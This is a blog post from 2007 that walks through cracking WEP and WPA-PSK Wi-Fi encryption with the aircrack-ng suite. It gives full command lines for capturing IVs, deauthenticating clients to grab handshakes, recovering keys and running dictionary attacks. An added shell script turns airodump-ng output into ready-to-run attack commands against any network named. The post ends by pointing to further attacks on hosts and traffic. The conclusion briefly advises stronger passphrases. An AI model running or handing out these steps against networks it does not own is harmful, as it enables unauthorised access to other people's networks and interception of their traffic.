
Syn: Breaking Encryption

http://synjunkie.blogspot.ro/search/label/Breaking Encry...


Syn
Adventures of a Security Junkie



Sunday, December 23, 2007

Wireless Network Penetration


The purpose of this blog post is to list the tools used and the steps followed for breaking into a wireless network protected with WEP or WPA-PSK encryption. Hopefully it will help the reader recognise how trivial it is to bypass WEP, or WPA-PSK protected with a weak password or pass-phrase; I shall point out the changes needed for WPA-PSK where appropriate. The network penetrated in this example was my own, but the encryption and setup were the same as what is usually found on most wireless networks.

Tools

airodump-ng
aireplay-ng
aircrack-ng
Wireless Assistant

The Attack

1. I first run airodump-ng to identify the networks I can see. This also confirms that my card is configured correctly.

airodump-ng wlan0


I see from the output that it correctly identifies my wireless network "joker" on channel 3 and provides the BSSID (we need this later). If my card wasn't correctly set up (i.e. in promiscuous and monitor mode) I could either run airmon-ng or set it up manually as detailed below. Monitor mode is what airodump-ng actually needs; promiscuous mode is harmless but not required.

ifconfig wlan0 down
ifconfig wlan0 promisc
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Then I would use ifconfig and iwconfig to make sure the settings were correct.

2. I now run airodump-ng with switches telling it to collect only the Initialization Vectors (IVs) on channel 3 and write them to a file, using my wireless interface (wlan0):

airodump-ng --ivs -c 3 -w wepdump wlan0


The result of this is two files, wepdump-01.txt and wepdump-01.ivs. The .ivs file is the one I am interested in (the .txt is airodump-ng's text listing of the access points and stations it saw).

When capturing data to break WPA-PSK, do not use the --ivs switch: the entire packet needs to be captured, because what aircrack-ng needs for WPA-PSK is the four-way handshake between a client and the AP, not IVs. Another requirement for WPA-PSK is therefore to catch a client associating. If no client happens to connect while you are listening, force one to re-associate by deauthenticating it with aireplay-ng:

aireplay-ng -0 1 -a {AP BSSID} -c {client MAC} wlan0

To obtain the AP BSSID and the client MAC I use Kismet, but airodump-ng shows them too: the lower table of its output lists each station it has seen along with the BSSID that station is associated with.


Note: when collecting the IVs, having the best signal possible will speed things up.

3. After 15 mins I stop the capture and run the collected IVs through aircrack-ng, specifying the BSSID of the target network:

aircrack-ng -b 00:18:F8:4B:43:86 wepdump-01.ivs

How long you need to capture depends on how busy the network is, not on the clock: aircrack-ng typically needs tens of thousands of unique IVs before its statistical attack succeeds, and it tells you if it has too few. If it does, leave the capture running longer or, if there is little traffic, generate some with aireplay-ng (see the "Cracking WEP with no clients" link at the end).

As you can see it has recovered the key: C3:C0:8C:90:3D (a 40-bit key, five bytes). If I were cracking WPA-PSK I would need to point aircrack-ng at a dictionary file with the -w switch and at the full .cap capture containing the handshake, so the syntax would be:

aircrack-ng -b 00:18:F8:4B:43:86 -w big-dictionary-file wpadump-01.cap

The dictionary attack only succeeds if the pass-phrase is in the word-list; a long random pass-phrase defeats it.

4. I now reconfigure my wireless card to connect to the wireless network.


Currently the card is in monitor mode, so I reconfigure it using the following commands:

ifconfig wlan0 down
ifconfig wlan0 -promisc
iwconfig wlan0 mode managed
ifconfig wlan0 up

Once reconfigured I quickly check that I can see the target network using:

iwlist wlan0 scan


5. I now use the Wireless Assistant to connect to the target network with the recovered key.


6. After connecting to the target network I check my network and wireless settings and test connectivity to the web.


Now that I have an IP address on this network I can use the connection to reach the Internet, perform further attacks against hosts on the wireless network, or capture the web traffic and do interesting things with it.
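The whole procedure above, from airodump-ng's listing to the aircrack-ng command, as an added example that is not part of the original post. It reads a constructed file in the layout airodump-ng writes beside the .ivs/.cap capture (wepdump-01.txt here; newer versions name it .csv, and column positions differ between versions, so check the header if you use a different release), pulls out the BSSID, channel and privacy type for a chosen ESSID plus the MACs of the clients associated with it, and prints the capture, deauth and crack command lines for either the WEP or the WPA-PSK path. The function names (ap_info, clients_of, plan_attack) are mine; --bssid is a real airodump-ng option that narrows the capture to the target AP. Only the joker BSSID comes from the post; the neighbouring WPA network, the client MACs and the counts are made up. It prints the commands rather than running them, so it works on any machine without a wireless card or the aircrack-ng suite installed.

```shell
#!/bin/sh
# Added example (not from the original post): read airodump-ng's text/CSV
# listing and compose the attack commands for a chosen ESSID.

# Constructed sample in airodump-ng's listing layout. Only the joker BSSID is
# from the post; the other network, the stations and the counts are made up.
SAMPLE_CSV=${TMPDIR:-/tmp}/airodump-sample.$$
trap 'rm -f "$SAMPLE_CSV"' EXIT
cat > "$SAMPLE_CSV" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:18:F8:4B:43:86, 2007-12-23 10:01:12, 2007-12-23 10:16:40,  3,  54, WEP, WEP, , -38, 1480, 41217,   0.  0.  0.  0,   5, joker, 
00:11:22:33:44:55, 2007-12-23 10:01:15, 2007-12-23 10:16:39, 11,  54, WPA, TKIP, PSK, -71,  990,     0,   0.  0.  0.  0,   9, neighbour, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1C:B3:AA:BB:CC, 2007-12-23 10:02:00, 2007-12-23 10:16:40, -44,     3120, 00:18:F8:4B:43:86, joker
00:16:6F:DD:EE:FF, 2007-12-23 10:05:10, 2007-12-23 10:16:21, -60,      210, 00:11:22:33:44:55, neighbour
00:21:5C:12:34:56, 2007-12-23 10:07:30, 2007-12-23 10:15:02, -67,       12, (not associated) , joker,neighbour
EOF

# ap_info FILE ESSID -> "BSSID channel privacy" for that network, taken from
# the access-point table (everything before the "Station MAC" header).
ap_info() {
    awk -F',' -v want="$2" '
        function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
        /^Station MAC/ { exit }
        NF >= 14 && trim($14) == want { print trim($1), trim($4), trim($6) }
    ' "$1"
}

# clients_of FILE BSSID -> one MAC per line for every station airodump-ng
# recorded as associated with that AP; unassociated probers are skipped.
clients_of() {
    awk -F',' -v ap="$2" '
        function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
        /^Station MAC/ { in_sta = 1; next }
        in_sta && NF >= 6 && trim($6) == ap { print trim($1) }
    ' "$1"
}

# plan_attack FILE ESSID [IFACE] -> the command lines for the WEP or WPA-PSK
# path described in the post. Printed, not executed: run them yourself on a
# card in monitor mode (airmon-ng, or the ifconfig/iwconfig sequence above).
plan_attack() {
    csv=$1; essid=$2; iface=${3:-wlan0}
    set -- $(ap_info "$csv" "$essid")
    bssid=$1; ch=$2; priv=$3
    [ -n "$bssid" ] || { echo "ESSID '$essid' not found in $csv" >&2; return 1; }
    case $priv in
    WEP)
        # IVs only, locked to the AP's channel and BSSID; -w sets the file prefix
        echo "airodump-ng --ivs -c $ch --bssid $bssid -w wepdump $iface"
        echo "aircrack-ng -b $bssid wepdump-01.ivs"
        ;;
    WPA*)
        # whole packets (no --ivs): the four-way handshake is what we need
        echo "airodump-ng -c $ch --bssid $bssid -w wpadump $iface"
        # deauth each associated client once so it re-associates and hands us the handshake
        for client in $(clients_of "$csv" "$bssid"); do
            echo "aireplay-ng -0 1 -a $bssid -c $client $iface"
        done
        echo "aircrack-ng -b $bssid -w big-dictionary-file wpadump-01.cap"
        ;;
    *)
        echo "no attack in this post for privacy type '$priv'" >&2; return 1
        ;;
    esac
}

plan_attack "$SAMPLE_CSV" joker
plan_attack "$SAMPLE_CSV" neighbour
```

Against the sample, the joker plan is the two WEP commands from steps 2 and 3; the neighbour plan is the WPA capture, one aireplay-ng deauth per associated client (the "(not associated)" prober is ignored, since deauthenticating it produces no handshake), and the dictionary run. Point it at a real listing by replacing SAMPLE_CSV with the .txt or .csv airodump-ng wrote next to your capture.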

Conclusion

WEP encryption is very broken. Only use it as a last resort, if no other encryption is available, and give WPA-PSK a long, random pass-phrase, since the dictionary attack above only works against weak ones. If you do need to use WEP, use additional layers of security to protect your network further, such as MAC address filtering, a hidden SSID, fixed IPs or a limited DHCP scope. These additional measures can all be bypassed, but they make the attacker's job that little bit harder.

Thanks to the guys at Remote Exploit for putting together BackTrack. BackTrack3 Kicks Ass!!!

Links

Cracking WPA-PSK Video
Cracking WEP with no clients


Posted by SynJunkie. Labels: Breaking Encryption, WiFi
